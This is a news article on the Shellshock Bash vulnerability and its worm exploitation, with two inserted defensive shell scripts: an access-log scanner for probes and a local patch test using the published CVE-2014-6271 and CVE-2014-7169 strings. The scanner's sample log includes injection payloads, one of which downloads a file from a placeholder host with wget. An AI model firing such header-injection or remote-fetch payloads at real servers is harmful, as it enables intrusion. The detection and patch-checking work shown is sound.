Could the Bash bug cause an internet MELTDOWN? Hackers scramble to exploit Shellshock flaw as experts warn your details may be at risk

Hackers have begun exploiting the devastating Bash bug, using worms that scan the internet for vulnerable computers before infecting them.

The Bash bug, also known as 'Shellshock', is a flaw in a piece of software known as 'Bash' that provides the command line on many Unix-like computers.

As damage from the bug spreads, the first patches released to safeguard computers have proved incomplete: the initial fix (for the flaw tracked as CVE-2014-6271) was found within a day to leave a related weakness open (CVE-2014-7169), and a second round of patches was needed.

Errata Security researcher Robert Graham tweeted (pictured) an example of how the bug can be exploited, and how commands can be injected into websites, on Macs running OS X. He warned that Bash is 'probably a bigger deal than Heartbleed' because it could threaten the security of millions of websites

'That's a problem. It's been a little over 24 hours and we're still in the same boat,' said Mat Gangwer, lead security consultant at Rook Security. 

'People are kind of freaking out. Rightfully so.' 

Expert Richard Stiennon wrote that the bug could quickly create a 'SQL Slammer type internet meltdown.'

SQL Slammer was a worm that, in January 2003, spread through unpatched Microsoft SQL Server installations so fast that it significantly slowed traffic across the internet.

Affected systems include Linux, which is used in everything from cars to cameras, as well as the Raspberry Pi, and other Unix systems, including IBM's, wherever Bash is installed. Android does not ship Bash by default, and Windows is exposed only if Bash has been installed on it separately (for example through Cygwin).

All versions of Apple's Mac OS X are also affected, as are around half of all websites, security experts claim. A website is exposed where its web server hands attacker-controlled input, such as request headers, to a program that runs Bash, typically a CGI script.

Hackers are already using massive internet scans to find vulnerable servers to attack, according to Robert Graham of Errata Security, writing in a blog post yesterday.

In a test, Mr Graham ran an internet-wide IP scan and found 3,000 vulnerable systems before the scan crashed.

Just a few hours later, Mr Graham found that someone was already using his method to attack computers. 

HOW WILL YOU BE AFFECTED? 

The bug makes all Apple Mac computers, around half of all websites and many internet-connected home appliances vulnerable, according to security experts.

The danger is that the attack runs in the background, without a user ever knowing, and once it succeeds a hacker will be able to run commands on the device.

For instance, the bug could be used to read or send emails, copy banking data, turn on a webcam or listen in on a computer's microphone.

Essentially, the attacker inherits the permissions of whichever program handed the input to Bash: if that program can do something without asking for a password, then someone using the bug can do the same.

Anyone using these devices will need to install a 'patch' update to the software as soon as it is released. As well as computers, the public is being warned they may need to update their internet-connected devices, such as smart locks, separately.

'Someone is using mass scan to deliver malware,' Mr Graham wrote in an update. 'They'll likely have compromised most of the systems I've found by tomorrow morning.'

The attack has become known as the 'Thanks, Rob' worm, and shows how quickly attacks can happen in the window before devices are updated with a patch.
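One way to tell whether your own web server was swept by scans like the one described above, as an added example that is not part of the article and is not Mr Graham's scanner or any vendor's tool. Scanners deliver the payload in a request header, and Apache's common 'combined' log format records two of those headers (Referer and User-Agent), so the '() {' prefix that Bash mis-parses shows up in the access log whether or not the command actually ran. The log lines, IP addresses and URLs below are constructed samples, and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not code from the article: flags Shellshock probes in an
# Apache "combined" access log. The log lines are constructed samples that
# use documentation IP ranges; the paths and URLs are invented for the demo.

# Extended regex for the exported-function prefix a vulnerable Bash mis-parses,
# tolerant of the spacing variants seen in scans ("() {", "(){", "()   {").
SHELLSHOCK_RE='\(\) *\{'

# Constructed sample log: two probes from one host (one in User-Agent, one in
# Referer), one ordinary visitor, and one probe from a second host.
LOG_SAMPLE='192.0.2.10 - - [25/Sep/2014:03:12:44 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/ping -c 1 198.51.100.5"
203.0.113.7 - - [25/Sep/2014:03:12:45 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Sep/2014:03:12:46 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 "() { :;}; /bin/bash -c \"wget http://198.51.100.5/x -O /tmp/x\"" "curl/7.30"
198.51.100.23 - - [25/Sep/2014:03:13:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "(){ :;}; /usr/bin/id"'

# Writes the sample to a temporary file and prints its path.
write_sample_log() {
  f=$(mktemp)
  printf '%s\n' "$LOG_SAMPLE" > "$f"
  echo "$f"
}

# Filters stdin down to lines that carry the prefix anywhere (path, Referer
# or User-Agent).
shellshock_probe_lines() {
  grep -E "$SHELLSHOCK_RE"
}

# Number of probing lines in the log file named by $1.
shellshock_probe_count() {
  shellshock_probe_lines < "$1" | wc -l | tr -d ' '
}

# Source IPs that sent probes, most active first, as "ip count".
shellshock_probe_sources() {
  shellshock_probe_lines < "$1" | awk '{print $1}' | sort | uniq -c \
    | sort -rn | awk '{print $2, $1}'
}

# The probes worth investigating first: a CGI path that answered 200 means a
# script exists there and the payload reached it, whereas a 404 means the
# scanner guessed a path that does not exist. Prints "ip path" per hit.
shellshock_probe_cgi_hits() {
  shellshock_probe_lines < "$1" | awk '$7 ~ /^\/cgi-bin\// && $9 == 200 {print $1, $7}'
}

# When run directly: summarise the constructed sample.
f=$(write_sample_log)
echo "probe lines: $(shellshock_probe_count "$f")"
echo "sources:"
shellshock_probe_sources "$f"
echo "CGI paths that answered 200 to a probe:"
shellshock_probe_cgi_hits "$f"
rm -f "$f"
```

Point the functions at a real log with `shellshock_probe_count /var/log/apache2/access.log`; only Referer and User-Agent are logged by default, so a payload carried in Cookie or another header will not be visible this way and needs full-request logging or a web application firewall in front of the server.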

'One key question is whether Mac OS X and iPhone DHCP service is vulnerable,' he said.

'Once the worm gets behind a firewall and runs a hostile DHCP server, that would be "game over" for large networks.' 

Many experts claim the flaw could be 'bigger than Heartbleed', a flaw in the OpenSSL encryption library that put every computer user at risk earlier this year.

'The impact is very severe, it's not overstating it to say it's a more serious bug than Heartbleed,' Professor Tim Watson, Director of the Cyber Security Centre at Warwick University, told MailOnline.

'The primary way this is going to be exploited is through the web… a hacker can use the bug to put malicious things on the website or to steal information, like banking details.' 

Many Linux providers, including Red Hat, have already prepared patches, but Apple users were left waiting for an update for OS X. Apple representatives could not be reached.

Tavis Ormandy, a Google security researcher, said via Twitter that the patches seemed 'incomplete.' The weakness he found was given its own identifier, CVE-2014-7169, and required a second patch.

Bash stands for Bourne Again Shell. It is what's called a command-line shell that lets users control software programs and features. Commands are normally typed into it by people with access to the system, but the Bash bug lets anyone who can get text into one of Bash's environment variables, for example through a web request, run commands of their own

'There is a lot of speculation out there as to what is vulnerable, but we just don't have the answers,' said Marc Maiffret, chief technology officer of cybersecurity firm BeyondTrust. 'This is going to unfold over the coming weeks and months.' 

Russian security software maker Kaspersky Lab reported that a computer worm has begun infecting computers by exploiting the Bash bug. 

The malicious software can take control of an infected machine, launch denial-of-service attacks on websites to disrupt their operations and scan for other vulnerable devices, including routers, said Kaspersky researcher David Jacoby.

He said he did not know who was behind the attacks and could not name any victims.

WHAT IS THE BASH BUG AND HOW DOES IT WORK?

Bash stands for Bourne Again Shell. It is what's called a command-line shell that lets users control software programs and features.

Users and scripts send commands to it as lines of text, and programs such as web servers often hand data to Bash behind the scenes.

Normally only someone with access to the system, such as a programmer or website owner, can do that, but the Bash bug lets anyone who can get text into one of Bash's environment variables run commands of their choosing: a vulnerable Bash executes whatever is appended to a variable whose value begins '() {'.

For example, Mac OS X users run Bash from their Terminal, as do people using devices on the Linux operating system.

Windows does not ship Bash and is not affected in the same way; a Windows PC is exposed only if Bash has been installed on it separately, although a hacker who takes over a vulnerable server could go on to attack the PCs that visit it.

The bug is said to have existed for 25 years, and was discovered by Linux expert Stéphane Chazelas. 

As an example, the Apache web server can run Bash in the background to carry out tasks, including processing personal data entered into online forms, through CGI scripts, and Apache copies the headers of each web request into the script's environment variables.

A hacker can therefore send a request whose headers carry the crafted text, make the server run commands, and then add malicious code to the site that sends visitors to other sites or installs a virus on their computers.

Once the hacker has access, they could launch an attack on every visitor that uses the site - and users could be none the wiser.

When the flaw was disclosed there had been no reports of real-world attacks, but that did not mean none had happened in the past without being detected, and scans and worms exploiting it were seen within a day.

Reports are suggesting Apple has patched the flaw that explicitly affects the terminal on its Mac software, but the firm has not officially confirmed this. 

The responsibility to fix the flaw on websites lies with the website owners; everyday users can do little beyond installing patches for their own computers and devices as they appear.

Website owners, especially running on Linux-based servers, are being told to check and patch their systems immediately.
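The check a website or server owner would run before and after patching, as an added example that is not code from the article, from Apple, Red Hat or the Bash project. It tests the local Bash for the original flaw (CVE-2014-6271) and for the follow-up the first patch missed (CVE-2014-7169), using the widely published test strings, and then replays the web path described above: a request header becomes a CGI environment variable that is handed to Bash. The `SHELLSHOCK_SHELL` variable, the function names and the minimal CGI script are this example's own constructions.

```shell
#!/bin/sh
# Added example, not code from the article: tests the Bash on this host for
# CVE-2014-6271 and CVE-2014-7169 and replays the Apache CGI attack path.

# Shell binary under test; override with SHELLSHOCK_SHELL=/bin/bash.
SHELLSHOCK_SHELL="${SHELLSHOCK_SHELL:-bash}"

# Prints "vulnerable:<CVE list>", "not-vulnerable" or "no-bash" and returns 0
# only when a test fires, so it can be used directly as an if condition.
shellshock_status() {
  if ! command -v "$SHELLSHOCK_SHELL" >/dev/null 2>&1; then
    echo "no-bash"
    return 1
  fi
  found=""

  # CVE-2014-6271: an exported variable whose value starts with "() {" is
  # imported as a function, and a vulnerable Bash keeps executing whatever
  # follows the closing brace, so "echo vulnerable" runs at startup.
  out=$(env x='() { :;}; echo vulnerable' "$SHELLSHOCK_SHELL" -c 'echo test' 2>/dev/null)
  case "$out" in
    *vulnerable*) found="CVE-2014-6271" ;;
  esac

  # CVE-2014-7169: after the first patch a truncated definition could still
  # leave the parser mid-statement, so the ">" carries into the next command
  # and "echo date" becomes a redirection that creates a file named "echo".
  # Run it in a scratch directory so nothing is left behind either way.
  scratch=$(mktemp -d)
  (cd "$scratch" && env X='() { (a)=>\' "$SHELLSHOCK_SHELL" -c 'echo date' >/dev/null 2>&1)
  if [ -e "$scratch/echo" ]; then
    found="${found:+$found,}CVE-2014-7169"
  fi
  rm -rf "$scratch"

  if [ -n "$found" ]; then
    echo "vulnerable:$found"
    return 0
  fi
  echo "not-vulnerable"
  return 1
}

# Apache's CGI module exports each request header as HTTP_<NAME>, upper-cased
# with dashes turned into underscores; this mirrors that naming rule.
cgi_header_to_env() {
  printf 'HTTP_%s' "$(printf '%s' "$1" | tr 'a-z' 'A-Z' | tr '-' '_')"
}

# Replays one request: a constructed User-Agent carries the payload, the
# environment is built the way the server would build it, and a minimal CGI
# script written for Bash is run. Prints "injected" if the payload's command
# produced output, otherwise "clean".
simulate_cgi_request() {
  ua='() { :; }; echo INJECTED'               # constructed attacker header
  var=$(cgi_header_to_env 'User-Agent')       # HTTP_USER_AGENT
  script='echo "Content-Type: text/plain"; echo; echo "hello from cgi"'
  out=$(env "$var=$ua" "$SHELLSHOCK_SHELL" -c "$script" 2>/dev/null)
  case "$out" in
    *INJECTED*) echo "injected" ;;
    *)          echo "clean" ;;
  esac
}

# When run directly: report the local Bash and the outcome of the replay.
shellshock_status || true
simulate_cgi_request
```

Run it, patch (for example `apt-get install --only-upgrade bash` on Debian and Ubuntu or `yum update bash` on Red Hat systems), then run it again: both tests must report not-vulnerable, because the first vendor patches passed only the first one. The replay is the reason the fix cannot stop at the web server: any program that launches Bash with attacker-supplied environment variables, from CGI handlers to DHCP clients, is an entry point.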

The Heartbleed flaw in the OpenSSL encryption library affected millions of sites earlier this year. By comparison, Heartbleed only allowed hackers to read data from affected computers; not take control of them

The bug could potentially allow hackers to gain access to every internet-enabled device in a person's home using something as innocuous as a smart lightbulb.

The danger with this, in particular, is that once it has access to an internet-connected device it can jump onto others, in theory. This includes smart locks that open front doors.

By comparison, 'Heartbleed' - dubbed a 'critical security flaw' at the time - only allowed hackers to spy on computers, not take control of them.

Bash does not require users to rush to change their passwords, but it does provide another way for hackers to take control of computers and devices.

'The method of exploiting this issue is also far simpler. You can just cut and paste a line of code and get good results,' according to Dan Guido, chief executive of cybersecurity firm Trail of Bits.

Its potential to disrupt Apple Mac computers, which use the Bash software, is of particular concern, experts warned.

The bug could allow hackers to gain access to every internet-enabled device in a person's home. The danger with this is that once it has access to an internet-connected device it can jump onto others in the home, in theory. This includes smart locks, such as the August lock (pictured), that open front doors remotely

HOW DOES THE BASH BUG COMPARE WITH HEARTBLEED? 

Unlike Heartbleed, which only affected OpenSSL versions released over the previous two years, the Bash bug has been in the code for around 25 years.

'That means there are lots of old devices on the network vulnerable to this bug,' said Robert Graham, of security firm Errata.

'The number of systems needing to be patched, but which won't be, is much larger than Heartbleed.'

The Heartbleed bug allowed hackers to spy on millions of computers all over the world.

Bash, however, allows hackers to read information, edit, delete or copy files, and run programmes. All of this can take place without the user knowing.

Unlike Heartbleed, which forced users to change their passwords, Bash doesn't have an easy fix. It will largely be up to system administrators and software companies to issue patches.

The only solution is to update every device that is vulnerable with a patch. And this can only be done by website and server owners, and by individuals on their home computers.

Tod Beardsley, an engineering manager at cybersecurity firm Rapid7, warned the bug was rated a '10' for severity, meaning it has maximum impact.

He also rated it 'low' for complexity of exploitation, meaning it is relatively easy for hackers to launch attacks.

'Using this vulnerability, attackers can potentially take over the operating system, access confidential information, make changes, et cetera,' Mr Beardsley said.

'Anybody with systems using Bash needs to deploy the patch immediately.' 

'Heartbleed,' discovered in April, was a bug in an open-source encryption software called OpenSSL.

The bug put the data of millions of people at risk as OpenSSL is used in about two-thirds of all websites.

It also forced dozens of technology companies to issue security patches for hundreds of products that use OpenSSL.

Bash is a shell, or command prompt software, produced by the non-profit Free Software Foundation. Officials at that group could not be reached for comment.
